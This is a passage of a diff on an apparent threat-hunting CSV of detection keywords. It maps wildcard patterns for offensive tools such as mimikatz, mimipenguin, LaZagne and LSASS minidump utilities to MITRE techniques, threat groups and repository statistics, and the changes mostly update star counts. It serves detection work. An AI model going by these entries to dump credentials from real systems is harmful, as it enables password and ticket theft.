TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilib.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*mimilove*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilove.exe*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimilove.vcxproj*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimikittenz*","offensive_tool_keyword","mimikittenz","mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff","T1003 - T1216 - T1552 - T1002 - T1083","TA0003 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/orlyjamie/mimikittenz","1","1","N/A","10","10","1793","352","2020-10-16T01:20:30Z","2016-07-04T13:57:18Z" +"*mimilib (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib for Windows (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.dll*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilib.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mimilove*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilove.exe*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimilove.vcxproj*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*mimipenguin*","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. This was assigned CVE-2018-20781 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781). Fun fact its still not fixed after GNOME Keyring 3.27.2 and still works as of 3.28.0.2-1ubuntu1.18.04.1.","T1555 - T1003 - T1212 - T1558","TA0001 - TA0003","N/A","N/A","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","N/A","N/A","10","3565","645","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z" "*mimipenguin.*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*mimipenguin.cna*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*mimipenguin.git*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*mimipenguin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*mimipenguin.git*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mimipenguin.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*mimipenguin.so*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*mimipenguin_x32.so*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*mimipy.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*mimiRatz*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*mimishim.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*mimispool.dll*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*mimispool.dll*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*minidump*minikerberos*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*minidump.* lsass.dmp*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*Minidump.exe*","offensive_tool_keyword","bof-collection","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" @@ -13611,52 +13769,52 @@ "*minidumpwritedump*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*MiniDumpWriteDump*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*mirrors.aliyun.com/parrot*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*misc::aadcookie*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::clip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::cmd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::compress*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::detours*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::efs*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - 